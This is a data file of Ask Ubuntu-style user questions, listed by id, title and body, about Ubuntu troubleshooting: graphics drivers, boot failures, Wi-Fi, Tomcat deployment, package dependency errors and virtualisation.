414297	how to boot to terminal ( ubuntu 12.04/gtx660ti ) ?	trying to install cuda for my ubuntu 12.04lts . installed the nvidia drivers for gtx660ti but have n't yet run the updates . the manual for cuda says i should now move to a tty via ctrl+alt+f1 but that brings a black screen , and the monitor goes to sleep showing nothing . ctrl+alt+f7 brings me back though . thought i could instead modify the /etc/default/grub , uncommenting either one of these lines : -grub_terminal=console -grub_gfxmode=640x480 and then sudo update-grub . both end me into a error : no video mode activated , which will not leave , and i can not access anything until i crash it so that i can go to recovery . so mainly i would like to just install the cuda , but if i could get my ctrl+alt+f1 to work i would like that too . i have tried several ways to fix it , and they all just make things worse . what should i do ? what i 'm following btw : how to install cuda 5.5 under ubuntu 12.04 lts 64-bit ?
414300	graphics corruption on lubuntu 13.10	i recently installed lubuntu 13.10 on my ibook g4 powerpc using the alternate installer and the installation , as far as i know , went fine , as no errors came up . i then rebooted and it booted fine . however , the login screen is terribly corrupted , as can be seen here : i have enabled the radeon_fb driver in /etc/modules , as the lack of that was the cause of several issues with sleep on my previous installation of lubuntu 12.04 . however , that did n't solve anything . i can access tty1 via ctrl+alt+f1 and can run commands , which i was n't able to do in the 12.04 installation because the text was corrupted in that installation . none of my google searches turn up anything for 13.10 , most of it is for 12.04 with some older , eol , mixed in ( 8.04/8.10 mainly ) . is there some driver i have to enable to fix this , or a command to run , or a patch to add ? i 'd rather not go back to 12.04 , as that is eol because lubuntu 12.04 is n't lts .
414301	another question about configuring openvpn server	i have a group of public ip addresses that i want to assign to assign to a remote client . i 'm using the latest version of openvpn on both the server and client side . the client can connect to the server and is assigned a public ip with no problem . but , for some reason , they ca n't access the internet at all once connected . i 'm completely new to openvpn and am lost in the sea of options i have . can anyone clue me in as to how i might make this work ? my current configuration can be found here for reference . note that i am only pushing out a single ip address to test instead of assigning from a pool but i will change this to a pool once i get things working . thanks !
414302	vim expandtab not set by fortran filetype	in /usr/share/vim/vim74/ftplugin/fortran.vim i see : '' tabs are not a good idea in fortran so the default is to expand tabs if ! exists ( `` fortran_have_tabs '' ) setlocal expandtab endif but when i open a .f90 file , tab characters are still inserted . set filetype ? shows filetype=fortran but set expandtab ? shows noexpandtab . what is wrong ?
414303	x server black screen	i 'm dual booting an old laptop with windows xp and ubuntu 12.04 lts . this has been working flawlessly since i started doing it a few years ago . i do n't us xp very often , only when i am recording music as there is no driver for my multitrack recorder . anyways the problem presented its self when i tried to go back into ubuntu . everything seemed to load fine i would get the ubuntu purple splash screen and then nothing , just black . i can switch to terminal using alt+shift+f1 so it 's not frozen . of all the cases i 've looked at online they deal with an update or a recent driver install , none of which i have done . nothing has changed on this system what so ever since it was working . i thought perhaps it was just time to reinstall . so i loaded up a usb with 13.10 and plugged it in . same thing , everything loads seemingly fine , i even got a mouse for a second or two then black . back end seems to being running fine . i 'm not terribly knowledgeable with linux yet but i 'm not a complete idiot when it comes to computers . i checked to see if windows did any updates i was n't aware of and nothing . i know this is very similar to many problems out there but none of those solutions proved useful , especially with the fresh usb boot .
414306	dell xps 13 developer edition + ubuntu 12.04 + bluetooth headphones = choppy sound	i have a dell xps 13 developer edition , the second version ( one with full hd graphics ) , running `` stock '' ubuntu 12.04 ( the one that came installed on the machine ) . when i connect bluetooth headphones ( august ep650 ) and try listening to some music , or playing movies , this is what happens : headphones connect without any problems , everything runs smoothly , and then , after couple of minutes , sounds start being choppy and goes out of sync with the video . it gets worse over time until the sound completely stops , or just turns into a series of glitches played every few seconds . reconnecting headset , or switching to telephony duplex mode , and then back to high fidelity , in sound settings helps , but then after couple of minutes all goes south again . adding enable=source in /etc/bluetooth/audio.conf did n't help . neither did installing pulsaudio version 2.0 from ubuntu-audio-dev ppa . i tried google , but no luck finding anything useful . some help would be greatly appreciated . p.s . the headset itself is functioning fine - i use it with my android tablet all the time , not a single issue so far .
414307	i do n't have notifications when changing the brightness	in order to have the brightness feature working on my eeepc ( ubuntu 13.10 , kernel 3.13 ) , i had to add to my /etc/default/grub : grub_cmdline_linux_default= '' quiet splash acpi_osi=linux '' it was only displaying notifications of brightness change , but was never changing the brightness . now it does , but i have lost the notifications . not a big deal , but i do n't understand . can you help ?
414309	recommended way to check/fire alarm in python ( pygi/pygtk )	i am learning to develop an application by using quickly ( quickly create ubuntu-application ) . this application will stay in application indicator / notification bar and only work when a defined `` alarm '' is triggered by the time or the main window is opened by the user . what is the recommended way to implement the `` alarm '' so it minimizes the cpu works and saves the battery ? other issue to be considered is that the user may change the system date & time . currently i have these : using gi.repository.glib.timeout_add_seconds ( 60 , . . . ) to check every minutes , so it will not miss if the user update the system date & time . using cron ; the problem will be the communication between the ui program and the triggered program ( by cron ) . using a sleeping thread ; not sure . maybe you have another better idea ? technical explanation are welcomed : ) . — thank you
414312	eye of gnome ( eog ) 3.6.0 in ubuntu 12.04	hello i was wondering if its possible to get eog 3.6 in ubuntu 12.04 , i tried the process here and it had some troubles with the dependencies so can someone help me with that . the reason i want the update because i want the latest improvements , like normal .
414316	install with external disk drive	i partitioned my hard drive , and downloaded ubuntu , and put it on a disk . my computers disk drive does not work , so i ca n't boot it via disk drive . my only options for booting are these : hdd lan fdd cd/rom usb memory i have searched google for this , but i ca n't find anything , and the only thing that shows up is external hard drive . is there any way i can install it from my external disk drive ?
414317	kde behaviour without using kubuntu ?	is there a way of getting the kde behaviour using unity ? . i mean the jumping icons and everything but without installing kde alongside gnome or unity .
414319	delete old kernels and unused files without ubuntu tweaks ?	i am wondering if there is a way of delete non-used package without using ubuntu tweaks . and if there is a way of deleting old kernels .
414320	ca n't get pass the grub menu on 12.04	i ca n't boot to ubunto 12.04 lts ; i get a blinking curso and my caps key led keeps flashing . i 've tried recovery mode and it gives thesame error.i 've tried loading previous version from the grub menu and have thesame error . it all started a week ago when i upgraded from 11.10 to ubuntu 12.04 lts and in the final stages of the upgrade i noticed that my screen had gone blank as usual when you leave your computer unattended for a while.when i moved the mouse it prompted for the password as usual but when i entered the password i could n't get to the desktop . the windows partition runs normally . the error is as follows : 251.908847 kernel panic not syncing : attempting to kill init 251.908862 pid 1 , comm : init not tainted 2.6.38-8-generic # 42 - ubuntu drdy err error { unc } etc -- -- i tried running apt-get update using live cd and got thesame error . enow
414324	where does unity dash store information ?	whenever i see unity dash taking hours to give me an answer i wonder where unity dash stores its information and whether there is a way of resetting that information ? i 've seen that if i make a search and close unity before i get any answer , the next time i look up something it will take a while to give an answer . is there a way of fixing that ?
414330	chrome does not start	i installed chrome on ubuntu and it does not work . appears only the icon , click on it and does not work .
414332	ubuntu 13.10 32 bit - system rebooting after shut down	i have a toshiba l505d . my system is suddenly rebooting on its own after shutting it down via the shut down option in the activities bar in gnome 3.10 . is this a know issue ? are there any logs i can provide to isolate what is causing this ?
414343	virtual usb drive for virtual box	i have a ubuntu installed on usb flash and it boots ok , and installed a virtual box on ubuntu which run windows 7 as a guest operating system the flash drive is partitioned into 3 partition and i want to use the non linux partition ( ntfs ) to be as a virtual usb so that i can install bit-locker on the guest operating system is this possible does any one have a clue or an idea about how this can be done because i searched the net to find a virtual usb emulator and i could not find this .
414344	how to add a session type button to lightdm-webkit-greeter theme ?	i 'm experimenting with the webkit greeter for lightdm . ubuntu 13.10 64 bits . i want to learn to create my own themes . i noticed that the default theme does not show a language select button or a session type select button . with the unity-greeter i can choose to start unity or gnome 3 . recently i started to prefer gnome 3 , that means that the webkit greeter is unusable to me right now as i 'm forced to start with unity when i want gnome 3 . is it possible to add a session type button to a webkit-greeter theme ? how ? must i edit the default theme files to show the button ?
414345	how can i downgrade packages without removing their dependants ?	i have a number of mesa packages that i had upgraded to a ppa version , before purging the ppa so i could upgrade my system . the differences in the versions are minor ( they are technically the same , just one set of libraries were from git and the others are the final versions ) . if i try to downgrade via synaptic , apt-get , or aptitude , i get thrown into dependency hell . is there a way to downgrade the packages manually ( perhaps one by one ) and mark their dependant packages as immovable ( if that makes sense ) until i am done ? p.s . this question : how to downgrade a package via apt-get ? is a bit different and does n't help this situation .
414346	ubuntu 13.10 boot issues	i downloaded the ubuntu 13 and every time i attempt to boot to ubuntu it just gives me colorful lines up and down ... is it a graphics card issue ? because i had to install the boot loaders from the h : drive ( cd-rom ) to get ubuntu to pop up on my boot screen .
414347	vm player not working after dist-upgrade from 13.04 to 13.10	yesterday i upgraded ubuntu from 13.04 to 13.10 . now vm-player is not working . its giving following error : before you can run vmware , several modules must be compiled and loaded into the running kernel .
414349	apt-get wo n't upgrade old generic-pae	running # apt-get upgrade i am told to run sudo apt-get -f install . i do that and see : the following extra packages will be installed : linux-generic-pae linux-headers-generic-pae linux-image-generic-pae the following packages will be upgraded : linux-generic-pae linux-headers-generic-pae linux-image-generic-pae 3 upgraded , 0 newly installed , 0 to remove and 138 not upgraded . 3 not fully installed or removed . need to get 0 b/6,460 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of linux-image-generic-pae : linux-image-generic-pae depends on linux-image-3.2.0-48-generic-pae ; however : package linux-image-3.2.0-48-generic-pae is not installed . dpkg : error processing linux-image-generic-pae ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of linux-headers-generic-pae : linux-headers-generic-pae depends on linux-headers-3.2.0-48-generic-pae ; however : package linux-headers-3.2.0-48-generic-pae is not installed . dpkg : error processing linux-headers-generic-pae ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of linux-generic-pae : linux-generic-pae depends on linux-image-generic-pae ( = 3.2.0.48.58 ) ; however : package linux-image-generic-pae is not configured yet . linux-generic-pae depends on linux-headers-generic-pae ( = 3.2.0.48.58 ) ; however : package linux-headers-generic-pae is not configured yet . dpkg : error processing linux-generic-pae ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-image-generic-pae linux-headers-generic-pae linux-generic-pae e : sub-process /usr/bin/dpkg returned an error code ( 1 ) here 's a listing of my /usr/src : /usr/src : total used in directory 88 available 19619852 drwxr-xr-x 22 root root 4096 feb 1 23:21 . drwxr-xr-x 10 root root 4096 aug 31 2012 .. drwxr-xr-x 24 root root 4096 jan 18 2013 linux-headers-3.2.0-36 drwxr-xr-x 7 root root 4096 jan 18 2013 linux-headers-3.2.0-36-generic-pae drwxr-xr-x 24 root root 4096 feb 1 2013 linux-headers-3.2.0-37 drwxr-xr-x 7 root root 4096 feb 1 2013 linux-headers-3.2.0-37-generic-pae drwxr-xr-x 24 root root 4096 feb 22 2013 linux-headers-3.2.0-38 drwxr-xr-x 7 root root 4096 feb 22 2013 linux-headers-3.2.0-38-generic-pae drwxr-xr-x 24 root root 4096 mar 19 2013 linux-headers-3.2.0-39 drwxr-xr-x 7 root root 4096 mar 19 2013 linux-headers-3.2.0-39-generic-pae drwxr-xr-x 24 root root 4096 apr 9 2013 linux-headers-3.2.0-40 drwxr-xr-x 7 root root 4096 apr 9 2013 linux-headers-3.2.0-40-generic-pae drwxr-xr-x 24 root root 4096 may 2 2013 linux-headers-3.2.0-41 drwxr-xr-x 7 root root 4096 may 2 2013 linux-headers-3.2.0-41-generic-pae drwxr-xr-x 24 root root 4096 may 16 2013 linux-headers-3.2.0-43 drwxr-xr-x 7 root root 4096 may 16 2013 linux-headers-3.2.0-43-generic-pae drwxr-xr-x 24 root root 4096 may 24 2013 linux-headers-3.2.0-44 drwxr-xr-x 7 root root 4096 may 24 2013 linux-headers-3.2.0-44-generic-pae drwxr-xr-x 24 root root 4096 may 31 2013 linux-headers-3.2.0-45 drwxr-xr-x 7 root root 4096 may 31 2013 linux-headers-3.2.0-45-generic-pae drwxr-xr-x 24 root root 4096 feb 1 23:21 linux-headers-3.2.0-58 drwxr-xr-x 7 root root 4096 feb 1 23:21 linux-headers-3.2.0-58-generic-pae most of my other machines have all the numbers in there between 45 and 58 also . i do n't think i even need this 48 version do i ?
414351	ubuntu 12.04 lts - acer aspire v3-571-6821 wireless on and off	i have an acer aspire v3-571-6821 on which i installed ubuntu 12.04 lts . after the installation , i have not been able to have my wireless connection working more that 10 minutes . it gets disconnected and connected again by itself . so far i have not had a solution for it . would you help ? thanks cesar
414356	wd black² dual drive motor always stops and starts	i installed ubuntu on a western digital wd black² dual drive . both partitions are working . but there is still an open problem : the motor of the hdd part of the sshd always stops and starts , over and over . that 's not good for the drive . how can i eliminate this ? ( i tried laptop-mode-tools and hdparm , but did n't have success )
414360	windows emulator as dosbox	i 'd want a windows emulator that works the same way as dosbox , i mean doxbox does n't open any .exe , you have to mount files into it , wine for example opens any .exe , and i think that 's not safe , i only want to emulate some games . thanks .
414367	headphone jack physically broken and that automute the speakers after about 1~2 minute	i have a annoying problem in my asus x52f laptop running raring ubuntu . my headphones jack had physically broken last mount and after this event the audio output automute after 1 to 2 minute of playback . i been searching a lot for a solution to stop automute or to disable the jack sensing , but i do n't found any working solution . i need your kindly help ...
414369	copying windows system32 files to wine system32 folder	i have installed ubuntu 13.10 32-bit with dual boot with windows 7 . can i copy windows 7 system 32 files to wine system32 folder for running my supreme comander , crysis2 games .
414370	apache tomcat7 webapp not working	i installed apache tomcat 7 from repository . but when i copy my apps to /usr/share/tomcat7-root and access through browser /myapp/form.html 404 error appears . is anything else is needed to configure ? is there any different deployment directory for webapps ? i also set export catalina_home=/usr/share/tomcat7 & export catalina_base=/varib/tomcat7 is this correct ? i also found /var/lib/tomcat7/webapps & also pasted myapp into this folder but still didnt worked . if so , what is difference between /usr/share/tomcat7-root & this /var/lib/tomcat7/webapps /etc/tomcat7/catalina/localhost does any configuration file require here ? any help will be appreciated !
414371	win8 not booting after installing ubuntu 12.04.3	win8 is not booting after ubu12.04.3 is installed , even though in grub the option 'windows8 loader ' appears.when i go in it says 'invalid efi path'.what shall i do ?
414375	permission denied in running script	i am running a script but there is an unusual warning : this is what happened in my console # whoami root # ls -l test.sh -rwxr-xr-x . 1 root root 1894 feb 2 01:58 test.sh* # ./test.sh -bash : ./test.sh : permission denied edit : my script : # ! /bin/bash while read pass port user ip file ; do echo `` startt -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- '' $ ip ping $ ip -c 4 if [ $ ? -eq 0 ] ; then echo $ ip ok ... else echo $ ip failed ... fi echo `` finish -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- '' $ ip done < < ____here pass 22 root 1.1.1.1 test.txt ____here any idea ? thank you
414376	dual-screen 13.10 radeoon	just upgrade from 12.04 to 13.10 and am running into some issues with the graphic driver . i use this system to run my projector often mirroring the output or as a second monitor . this worked fine running 12.04 but in 13.10 when i try to set it all up only one screen will work at a time regardless of if it is on mirror or extended screen . lspci | grep vga 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rv380/m24 [ mobility radeon x600 ] sudo lshw -c video *-display description : vga compatible controller product : rv380/m24 [ mobility radeon x600 ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:42 memory : d0000000-d7ffffff ioport:4000 ( size=256 ) memory : c8100000-c810ffff memory : c8120000-c813ffff i have tried installing fglrx propriety but it sent me into low graphics mode that did n't load properly and gave me an all blue screen . i got the system back by purging fglrx from the recovery mode root terminal . i have seen solutions to this problem with nvidia graphics cards but obviously those are n't going to work for me .
414384	unable to install ubuntu 12.04 along with windows 7 on a 4th gen i5 processor machine	i tried but to failed to dual boot my machine with ubuntu 12.04 and windows 7 ( already installed ) .my machine has a 4th gen i5 processor ... .is that a problem ... a known glitch ? ?
414386	startup applications got messed up - dropbox and redshift not loading automatically	i have had problems with dropbox launching at start up , so i 've asked this question . the problem is that now , after implementing what the user has posted , dropbox is n't loading and it also messed up other startup entries , such as redshift . how can i fix this ?
414387	ca n't add facebook account to gwibber	i am using gwibber 3.4.2 in ubuntu 12.04 lts . when i am trying to authorise facebook access , an error is coming showing the owner of this app has not configured facebook integration properly . how to fix this problem ?
414388	ath9k 802.11n 300mbps at low speed	i 'm testing my new home 802.11n network . router - slax 7 , kernel 3.8.2 , ar9382 mini pci-e ( sparklan wpea-121n ) wlan0 ieee 802.11abgn essid : '' xyz '' mode : ad-hoc frequency:2.412 ghz cell : 96:77:38 : f7:80 : c8 tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : on desktop - slackware 14.1 , kernel 3.10.17 , ar9287 pci-e x1 ( tp-link tl-wn881nd ) wlan0 ieee 802.11bgn essid : '' xyz '' mode : ad-hoc frequency:2.412 ghz cell : 96:77:38 : f7:80 : c8 tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off laptop - windows 7 , intel centrino advanced-n 6205 all computers are in the same place , standing next to each other , inssider shows no interference with other networks , very good signal quality . all wireless adapters can theoretically work in 802.11n 300mbps speed . i set up ad-hoc network with iw wlan0 ibss join xyz 2412 ht40+ i 'm testing speed with iperf . i ca n't get more than 3-4mbps between any of my devices . when using 802.11g ( noht option ) i get 17-19mbps between my desktop and server . laptop still at 4mbps . whats going on ? why i ca n't reach even 50 % of 802.11g ? when doing iwlist wlan0 scan i never see available bitrates > 54mb/s for my network .
414389	while installing the openssh-server package getting an error like error : dependency is not satisfiable : libc6 ( > = 2.15 ) please help me out of it	while installing the openssh-server package getting an error like error : dependency is not satisfiable : libc6 ( > = 2.15 ) please help me out of it ...
414393	unable to keep dual screen configuration ?	i have installed latest nvidia drivers for my graphic card and then used nvidia-settings program to setup my dual screen configuration and save it to xorg.conf file but each time i restart system it comes back to default configuration : ( did i miss something ? â running in saucy 13.10 thanks vincă¨n
414394	how to install d-link dwa-123 wireless n 150 wi fi adapter in ubuntu 13.4 ?	i am using ubuntu 13.4 on my laptop . the wi fi adaptor which came along with my laptop is not working . so i got an external usb wi fi adaptor d-link dwa-123 wireless n 150. could any one please help me how to install and use it on my laptop ?
414395	installing and only using radeon hd 6630m on vaio vpc-cb15f	at the moment my sony vaio vpc-cb15f is using only my integrated intel hd graphics 3000 graphics card with the `` x.org x server - amd/ati display driver wrapper from xserver-xorg-video-ati '' drivers , however i would like to : a ) get my amd radeon hd 6630m graphics card working and ; b ) use the radeon hd 6630m exclusively ( i.e . not use the integrated intel hd graphics 3000 graphics card at all ) . i 'm not worried about whether it 's propriety or open source drivers , just as long as i am either using my radeon hd 6630m exclusively or i am able to switch between the two effortlessly ( though as i said , i 'd prefer the former ) ... at the time of writing , i am using ubuntu 13.10 ( `` saucy salamander '' ) , however as per usual , i will be upgrading to ubuntu 14.04 lts ( `` trusty tahr '' ) the moment it is available ( i typically upgrade to each new version , .04 lts and .10 ) . being someone that is semi-competent with terminal , i have `` toyed '' with this in the past , but the last time i did , ubuntu would boot-in to a plain black screen after login and i had to run a whole heap of commands from the recovery terminal ( at boot ) in order to get things running again ... most likely however , it was because i `` broke '' something when trying to setup my radeon hd 6630m - i did it using a whole page of commands i found via google , none of which was specific to my laptop . any help in sorting things out would be greatly appreciated ...
414396	how does ubuntu remembers process history ?	recently i noticed two things in my ubuntu-13.10 ( 32-bit ) and would like to get cleared . scenario-1 : one of the functionality of terminal is that you can get previous commands by using `` up '' arrow key . but when i used up arrow , it was showing me all commands that i am using since last many days . i have switched off my laptop many times since then . ( i am not hibernating it , i completely shut it down each time ) question : how is ubuntu remembering all this commands ? does it saves the states in some kind of cache or something ? ? scenario-2 : similar was the case with pdf files . when i opened a pdf in one of the in-built `` document reader '' , it directly started from the page where i last left reading . question : again the same question arose and that is `` how did ubuntu came to know that i left on that particular page ? '' it may be the cache issue but i guess cache in ubuntu is cleared completely at every shutdown . thanks ,
414397	can not install ubuntu 12.04.3lts	i am having installation problem on asus k55vd laptop.i selected install ubuntu alongside windows 8 and after clicking to continue it restarts my laptop and i can not install ubuntu .
414399	how can i install gambas3 on ubuntu ?	i tried to install yumi on ubuntu , i mean the multiboot-able creator , but it needs : yumi depends on gambas3-gb-runtime ( > = 3.0.90 ) ; however : package gambas3-gb-runtime is not installed . yumi depends on gambas3-gb-image ( < < 3.99.0 ) ; however : package gambas3-gb-runtime is not installed . yumi depends on gambas3-gb-image ( > = 3.0.90 ) ; however : package gambas3-gb-image is not installed . yumi depends on gambas3-gb-image ( < < 3.99.0 ) ; however : package gambas3-gb-image is not installed . yumi depends on gambas3-gb-gtk ( > = 3.0.90 ) ; however : package gambas3-gb-gtk is not installed . yumi depends on gambas3-gb-gtk ( < < 3.99.0 ) ; however : package gambas3-gb-gtk is not installed . yumi depends on gambas3-gb-form ( > = 3.0.90 ) ; however : package gambas3-gb-form is not installed . yumi depends on gambas3-gb-form ( < < 3.99.0 ) ; however : package gambas3-gb-form is not installed . how can i install gambas3 on ubuntu ?
414400	what 's breaking suspend	i have problem with suspend , every morning around 7am my computer wakeup . i do not wish it to do it because it sometimes drains my battery if not in charger . how do i fix this ? : ) ubuntu 13.10 , amd proprietary drivers , using dejaup for backups..
414402	installed tomcat 7 but can not run apps	installed tomcat7 via repository via synaptic package manager & pasted my app ( beerv1 ) folder to /var/lib/tomcat7/webapps/ & also to /usr/share/tomcat7-root/ still gets http status 404 - /beerv1/form.html please help !
414404	wont't mount external drive that has recovery partition for my mac	what does that mean ? error mounting system-managed device /dev/sdb3 : command-line `mount `` /mnt/usb-toshiba_external_usb_3.0_2012021670758-0:0-part3 '' ` exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sdb3 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so ( udisks-error-quark , 0 )
414411	feedingbottle and fern 's wifi cracker are n't showing up after being installed	i got lubuntu ( release 12.04 ( precise ) 32-bit , kernel linux 3.2.0-58-generic , gnome 3.4.2 ) . i got the deb for both feedingbottle and fern 's wifi cracker . both look like they installed correctly , no errors : unpacking replacement fern-wifi-cracker ... setting up fern-wifi-cracker ( 1.6 ) ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... selecting previously unselected package fern-wifi-cracker . ( reading database ... 183422 files and directories currently installed . ) unpacking fern-wifi-cracker ( from ... /fern-wifi-cracker_1.6_all.deb ) ... setting up fern-wifi-cracker ( 1.6 ) ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... and ... ... ( reading database ... 183675 files and directories currently installed . ) unpacking feedingbottle-3.2.3 ... setting up feedingbottle-3.2.3 ( 3.2.3 ) ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... but for some weird unknown reason , they are refusing to show up on the main menu like they have for any other version of ubuntu or even backtrack for that matter . fern 's however does n't give me the option to `` re-install this software '' option on the deb installer tho . so i know there 's something wrong here . feedingbottle is n't running thru terminal . says it does n't know what command that is . *updated with own response to one question : * i solved my own problem . google was no help and i only got answers from someone who did n't even know what the question was about so i 'll share my own findings here : for those who ca n't feedingbottle in lubuntu , it 's in /bin/feedingbottle . you 'll have to make your own shortcuts . found this by digging around in the file system to see if by some fluke if i could find it . fern-wifi-cracker however theres still a problem , ca n't find it and i also noticed the package installer is n't giving me the to reinstall it when i try to reinstall it , wondering if fern 's even compatible with lubuntu .
414412	virt-manager with xen ca n't change configuration	if i try to add new hardware ( it is just usb ) - xm usb-list-assignable-devices 1-1.2 : id 064e : a136 suyin usb 2.0 uvc 0.3m webcam 1-1.5 : id 0b05:1788 broadcom corp bt-270 2-1.2 : id 1d57:001d hid compliant-mouse hid compliant-mouse it gives me nothing . without errors just nothing . just ignores my command ... if i try to start new domu and mark what hardware i want to add in pv mode it gives me errors unable to complete install : 'post operation failed : xend_post : error from xen daemon : ( xend.err `` error creating domain : boot loader did n't return any data ! '' ) ' traceback ( most recent call last ) : file `` /usr/share/virt-manager/virtmanager/asyncjob.py '' , line 44 , in cb_wrapper callback ( asyncjob , *args , **kwargs ) file `` /usr/share/virt-manager/virtmanager/create.py '' , line 1910 , in do_install guest.start_install ( false , meter=meter ) file `` /usr/lib/python2.6/site-packages/virtinst/guest.py '' , line 1223 , in start_install noboot ) file `` /usr/lib/python2.6/site-packages/virtinst/guest.py '' , line 1291 , in _create_guest dom = self.conn.createlinux ( start_xml or final_xml , 0 ) file `` /usr/lib64/python2.6/site-packages/libvirt.py '' , line 2607 , in createlinux if ret is none : raise libvirterror ( 'virdomaincreatelinux ( ) failed ' , conn=self ) libvirterror : post operation failed : xend_post : error from xen daemon : ( xend.err `` error creating domain : boot loader did n't return any data ! '' ) if i start new fully virtualized domu it just ignores all my usb devices that i want to add and which are in assignable-devices onother possibility is console usb attach ... but > xm usb-list ubuntu > > xm usb-list ubuntu > idx be state usb-ver be-path > 0 0 1 usb2.0 /local/domain/0/backend/vusb/14/0 > port 1 : > port 2 : > idx be state usb-ver be-path > 1 0 1 usb2.0 /local/domain/0/backend/vusb/14/1 > > xm usb-attach ubuntu 0 1 2-1.1 > unexpected error : < class 'xen.util.vusb_util.usbdeviceparseerror ' > > > please report to xen-devel @ lists.xen.org > traceback ( most recent call last ) : > file `` /usr/sbin/xm '' , line 7 , in < module > > main.main ( sys.argv ) > file `` /usr/lib64/python2.6/site-packages/xen/xm/main.py '' , line 3983 , in main > _ , rc = _run_cmd ( cmd , cmd_name , args ) > file `` /usr/lib64/python2.6/site-packages/xen/xm/main.py '' , line 4007 , in _run_cmd > return true , cmd ( args ) > file `` /usr/lib64/python2.6/site-packages/xen/xm/main.py '' , line 3046 , in xm_usb_attach > if vusb_util.bus_is_assigned ( bus ) : > file `` /usr/lib64/python2.6/site-packages/xen/util/vusb_util.py '' , line 275 , in bus_is_assigned > raise usbdeviceparseerror ( `` ca n't get assignment status : ( % s ) . '' % bus ) > xen.util.vusb_util.usbdeviceparseerror : vusb : error parsing usb device info : ca n't get assignment status : ( 2-1.1 ) . what to do ?
414413	open file with command-line program	i 'm looking for a way to open a .py file with python in a terminal every time a file is double-clicked in a gui file manager , like in windows . how would i go about doing this ? for ubuntu 13.10
414414	no connectivity from gns3 to wan	i have the following problem and i 'm not sure if this is the right forum for it , but if someone is familiar with this , any help will be much appreciated . basically i want to build a virtualized lan enviroment using vmware 10 , including three servers ( all ubuntu servers 12.04 lts ) : 1st server dedicated to network devices only - i want to run gns3 on that server and connect virtualized lan ( that will be on the other two vm servers ) and the internet ( wan ) via cisco router+ perform basic acl 's , nat e.t.c . 2nd server - dhcp , dns - server that will run dhcp and dns services . 3rd server- web server . my host is ubuntu 12.04 , and my lan network is 192.168.1.0/24 and connected to a router which has wan connectivity ( router 's ip 192.168.1.1 ) . i have ran the first virtual server ( gns3 ) with two network interfaces ( eth0 and eth1 ) when eth0 is bridged and eth1 is a host only . eth0 received an ip address from my real router 's dhcp pool ( 192.168.1.x ) eth1 received some private address from 172.x.x.x pool ( does n't really matter , it can be changed in vmware settings ) i have created tap0 and tap1 interfaces , gave them both ip 0.0.0.0 and set them up in promisc mode . did the same with eth0 and eth1 . then i have created two bridge interfaces , br0 and br1 . after that i have added eth0 +tap0 to br0 and eth1+tap1 to br1 . in gns3 , i have added two clouds and a cisco router . cloud1 is the wan ( tap0 ) , and cloud2 is the vm lan ( tap1 ) . i have connected cisco 's router to cloud1 using tap0 , and to cloud 2 using tap1 . when i set up router 's fast ethernet 0/0 to receive it 's ip address from dhcp pool , it received 192.168.1.x ip from my real router , which means there is connectivity , but problem is that i can not ping 8.8.8.8 ( wan ) nor my real default gateway 192.168.1.1 from the cisco router . i have connectivity from gns3 to my vmware lan , but i dont have connectivity from the router outside . does anyone has a clue about this ? or could someone direct me to the correct forum , if i have posted it in the wrong one . thanks in advance .
414416	how to make my netbook wifi hotspot in lubuntu 13.10 ?	in ubuntu , in the network settings there is an option to make your computer wifi hotspot . in lubuntu i cant find that option . i am using lubuntu 13.10 .
414417	my ubuntu 11.04 does not upgrade	i tried a number of times to upgrade my os but this is the error i get : checking for a new ubuntu release your ubuntu release is not supported anymore . for upgrade information , please visit : http : //www.ubuntu.com/releaseendoflife get:1 upgrade tool signature [ 198 b ] get:2 upgrade tool [ 1471 kb ] fetched 1471 kb in 0s ( 0 b/s ) extracting 'oneiric.tar.gz' authenticate 'oneiric.tar.gz ' against 'oneiric.tar.gz.gpg ' reading cache a fatal error occurred please report this as a bug and include the files /var/log/dist-upgrade/main.log and /var/log/dist-upgrade/apt.log in your report . the upgrade has aborted . your original sources.list was saved in /etc/apt/sources.list.distupgrade . traceback ( most recent call last ) : file `` /tmp/update-manager-a98bq0/oneiric '' , line 7 , in sys.exit ( main ( ) ) file `` /tmp/update-manager-a98bq0/distupgrademain.py '' , line 201 , in main save_system_state ( logdir ) file `` /tmp/update-manager-a98bq0/distupgrademain.py '' , line 107 , in save_system_state clone.save_state ( sourcedir= '' / '' , target=target , with_dpkg_status=true ) file `` /tmp/update-manager-a98bq0/apt_clone.py '' , line 131 , in save_state self._write_state_installed_pkgs ( sourcedir , tar ) file `` /tmp/update-manager-a98bq0/apt_clone.py '' , line 158 , in _write_state_installed_pkgs cache = self._cache_cls ( rootdir=sourcedir ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 89 , in init self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 127 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : problem closing the gzip file /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_natty_restricted_binary-i386_packages - close ( 5 : input/output error ) , e : the package lists or status file could not be parsed or opened . i need help ...
